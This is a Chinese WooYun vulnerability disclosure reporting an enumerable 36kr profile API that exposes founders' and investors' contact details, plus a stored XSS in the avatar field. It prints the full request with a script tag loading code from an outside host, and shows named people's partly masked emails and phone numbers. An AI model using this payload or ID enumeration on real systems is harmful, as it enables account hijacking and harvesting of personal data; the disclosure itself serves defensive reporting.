当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0115518

漏洞标题:36kr用户信息泄露可获取所有投资人/创始人联系方式+某处存储型XSS

相关厂商:36氪科技博客

漏洞作者: loli

提交时间:2015-05-22 14:57

修复时间:2015-07-06 15:18

公开时间:2015-07-06 15:18

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-22: 细节已通知厂商并且等待厂商处理中
2015-05-22: 厂商已经确认,细节仅向厂商公开
2015-06-01: 细节向核心白帽子及相关领域专家公开
2015-06-11: 细节向普通白帽子公开
2015-06-21: 细节向实习白帽子公开
2015-07-06: 细节向公众公开

简要描述:

上午去见了个投资人,他说:“十秒内让我记住你的团队”,我想了想上去就给他一巴掌,趁他还楞着我赶紧跑了,结果刚刚收到一条短信让我明天10点去详谈,我到底该不该去呢?

详细说明:

测试环境:

Note2+36kr 安卓2.1.0版本


1.app接口未授权访问获取用户信息
注册登录rong.36kr.com ,我这里是直接通过手机短信验证的。
访问接口url: 

http://rong.36kr.com/api/v1/ios-user/-ID-/profile


ID处可遍历,比如查看足记app创始人的联系方式:

3C8712F7-2B32-4A56-AB41-CC56E8230B2B.png


查看创始人联系方式:
http://rong.36kr.com/api/v1/ios-user/711/profile (需要先登录自己的账号)

user":{"avatar":"http://krplus-pic.b0.upaiyun.com/201503/23195614/7be9e2cc259d7834.jpg","email":"laputan马赛克@fotoplace.cc","enterpriser":1,"id":711,"investorType":100,"isDisplayWeixin":false,"name":"杨柳","nickAvatar":"http://wx.qlogo.cn/mmopen/ajNVdqHZLLAl21jrHaCHQzgF1DrAsBDIJ1RJ3Hvvr8PCfmCQIkfbBHKoItkKTgDBV4SDZSFgiaoZUs4sdR7udXQ/0","nickName":"杨柳(足记fotoplace)","phone":"13918331马赛克"}},"msg":"操作成功!"}


查看投资人联系方式:
http://rong.36kr.com/api/v1/ios-user/28633/profile

user":{"avatar":"http://krplus-pic.b0.upaiyun.com/c00dd2691e0937663493df104fb18976","email":"马赛克u@hearst.com","enterpriser":0,"id":28633,"intro":"赫斯特资本中国投资主管","investorType":20,"isDisplayWeixin":false,"linkedin":"","name":"胡盈青","nickName":"1350199马赛克","phone":"1350199马赛克","weibo":""}


---------------------------------------------------------------------------------------
2.存储型xss
app上传头像,然后直接调用了该图片地址。
这是更新头像的请求包。

PUT /api/v1/user/我的id/basic HTTP/1.1
Cookie: 我的Cookie信息;
Content-Length: 54
Content-Type: application/x-www-form-urlencoded
Host: rong.36kr.com
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
avatar=http://krplus-pic.b0.upaiyun.com/xxxxxx.jpg"><script src=http://t.cn/xxx></script>


avatar参数可自定义,由于未做过滤导致可插入xss代码,效果如下:

409EC4FE-9165-4AD7-854A-38209B99F80D.png


Cookie中关键的token信息应该是采用了httponly保护。

漏洞证明:

05D9AA4F-AACC-4448-91B0-FF9764636663.png

修复方案:

xss这里我只测试了APP的头像,用户名称和个人资料等地方请自查。

版权声明:转载请注明来源 loli@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-05-22 15:16

厂商回复:

感谢提醒!

最新状态:

2015-05-27:当天已处理,非常感谢。但还是等日期到了自动公开吧:)

漏洞评价:

评论

  1. 2015-05-22 14:59 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    去!

  2. 2015-05-22 15:13 | 疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫,我笑世人看不穿~)

    去!

  3. 2015-05-22 15:41 | loli 认证白帽子 ( 普通白帽子 | Rank:550 漏洞数:52 )

    @36氪科技博客 RUN 好人啊1024。

  4. 2015-05-22 17:03 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    多带点兄弟去!

  5. 2015-05-27 00:48 | mantis ( 路人 | Rank:21 漏洞数:5 | 一萧一剑走江湖,千古情愁尿一壶)

    对36kr情有独钟